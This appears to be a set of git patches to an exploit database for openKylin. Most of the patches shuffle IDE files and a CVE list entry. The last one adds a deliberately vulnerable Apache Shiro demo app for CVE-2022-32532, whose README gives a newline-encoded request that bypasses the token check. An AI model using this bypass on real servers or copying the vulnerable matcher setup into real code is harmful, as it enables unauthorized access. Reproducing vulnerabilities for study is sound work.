+
+
+
+
+
+
+
+
+
+
+
+ 1681355429624
+
+
+ 1681355429624
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 76b55ee1..5d5c89dd 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -40,7 +40,9 @@ cve:
apache-unomi:
- CVE-2020-13942
apache-struts:
- - CVE-2019-0230
+ - CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee
From 5803165d660b38c7d42ead80ea208ceb60c1de2e Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 12:00:33 +0800
Subject: [PATCH 06/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/workspace.xml | 60 ---------------------------------------------
1 file changed, 60 deletions(-)
delete mode 100644 .idea/workspace.xml
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
deleted file mode 100644
index 1723fab4..00000000
--- a/.idea/workspace.xml
+++ /dev/null
@@ -1,60 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1681355429624
-
-
- 1681355429624
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
--
Gitee
From cc9575e7f049b64ffc081703e1d14d64397e85dc Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:04:20 +0800
Subject: [PATCH 07/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 ++
.idea/misc.xml | 4 ++
.idea/modules.xml | 8 +++
.idea/openkylin-exploit-db.iml | 12 ++++
.idea/vcs.xml | 7 +++
.idea/workspace.xml | 59 +++++++++++++++++++
6 files changed, 96 insertions(+)
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
create mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..24f4484d
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 00000000..97f7c091
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,59 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1681355429624
+
+
+ 1681355429624
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
--
Gitee
From 1391ad827ee6462a8e67e7738760988ec3a19248 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:09:05 +0800
Subject: [PATCH 08/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 --
.idea/misc.xml | 4 --
.idea/modules.xml | 8 ---
.idea/openkylin-exploit-db.iml | 12 ----
.idea/vcs.xml | 7 ---
.idea/workspace.xml | 59 -------------------
openkylin_list.yaml | 2 -
7 files changed, 98 deletions(-)
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
delete mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 24f4484d..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
deleted file mode 100644
index 97f7c091..00000000
--- a/.idea/workspace.xml
+++ /dev/null
@@ -1,59 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1681355429624
-
-
- 1681355429624
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5d5c89dd..6202811e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -41,8 +41,6 @@ cve:
- CVE-2020-13942
apache-struts:
- CVE-2019-0230
- apache-Shiro:
- - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee
From 1522f97d86ef2bc615b9780eb155c3ff3614fe21 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:12:34 +0800
Subject: [PATCH 09/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
openkylin_list.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 6202811e..5d5c89dd 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -41,6 +41,8 @@ cve:
- CVE-2020-13942
apache-struts:
- CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee
From 3b96418e1411bba72f872fe206d135f82202a7fd Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:25:01 +0800
Subject: [PATCH 10/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 ++
.idea/misc.xml | 4 +
.idea/modules.xml | 8 ++
.idea/openkylin-exploit-db.iml | 12 +++
.idea/vcs.xml | 7 ++
.idea/workspace.xml | 77 +++++++++++++++++++
6 files changed, 114 insertions(+)
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
create mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..24f4484d
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 00000000..d26ad8c9
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,77 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {
+ "keyToString": {
+ "ASKED_ADD_EXTERNAL_FILES": "true",
+ "ASKED_SHARE_PROJECT_CONFIGURATION_FILES": "true",
+ "RunOnceActivity.OpenProjectViewOnStart": "true",
+ "RunOnceActivity.ShowReadmeOnStart": "true"
+ }
+}
+
+
+
+
+ 1681355429624
+
+
+ 1681355429624
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
--
Gitee
From cc1dbae9205103c84e3fa32583cc011c20f3cb84 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:25:16 +0800
Subject: [PATCH 11/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 --
.idea/misc.xml | 4 -
.idea/modules.xml | 8 --
.idea/openkylin-exploit-db.iml | 12 ---
.idea/vcs.xml | 7 --
.idea/workspace.xml | 77 -------------------
6 files changed, 114 deletions(-)
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
delete mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 24f4484d..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
deleted file mode 100644
index d26ad8c9..00000000
--- a/.idea/workspace.xml
+++ /dev/null
@@ -1,77 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- {
- "keyToString": {
- "ASKED_ADD_EXTERNAL_FILES": "true",
- "ASKED_SHARE_PROJECT_CONFIGURATION_FILES": "true",
- "RunOnceActivity.OpenProjectViewOnStart": "true",
- "RunOnceActivity.ShowReadmeOnStart": "true"
- }
-}
-
-
-
-
- 1681355429624
-
-
- 1681355429624
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
--
Gitee
From a8652da8bd63657eb6908348eeeb495454d279ff Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:44:37 +0800
Subject: [PATCH 12/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/apache-Shiro/2022/CVE-2022-32532 | 1 -
.../2022/CVE-2022-32532/.gitignore | 33 +++++++++++++++
.../2022/CVE-2022-32532/README.md | 35 ++++++++++++++++
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ++++++++++++++++++
.../com/example/shirodemo/DemoController.java | 21 ++++++++++
.../java/com/example/shirodemo/MyFilter.java | 35 ++++++++++++++++
.../shirodemo/MyShiroFilterFactoryBean.java | 40 +++++++++++++++++++
.../com/example/shirodemo/ShiroConfig.java | 22 ++++++++++
.../shirodemo/ShiroDemoApplication.java | 13 ++++++
.../src/main/resources/application.properties | 0
10 files changed, 237 insertions(+), 1 deletion(-)
delete mode 160000 cve/apache-Shiro/2022/CVE-2022-32532
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532 b/cve/apache-Shiro/2022/CVE-2022-32532
deleted file mode 160000
index 58c03400..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 58c03400ee5ad0fa4bd8b5d1908c750b6c42a34b
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 00000000..975b0366
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 00000000..5210b547
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.7.0
+
+
+ com.example
+ shiro-demo
+ 0.0.1-SNAPSHOT
+ shiro-demo
+ CVE-2022-32532
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+ org.apache.shiro
+ shiro-spring
+ 1.9.0
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 00000000..fd71b1a0
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 00000000..beaf98ae
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 00000000..d24431e4
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 00000000..30a0f1b5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 00000000..5d4615bd
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 00000000..e69de29b
--
Gitee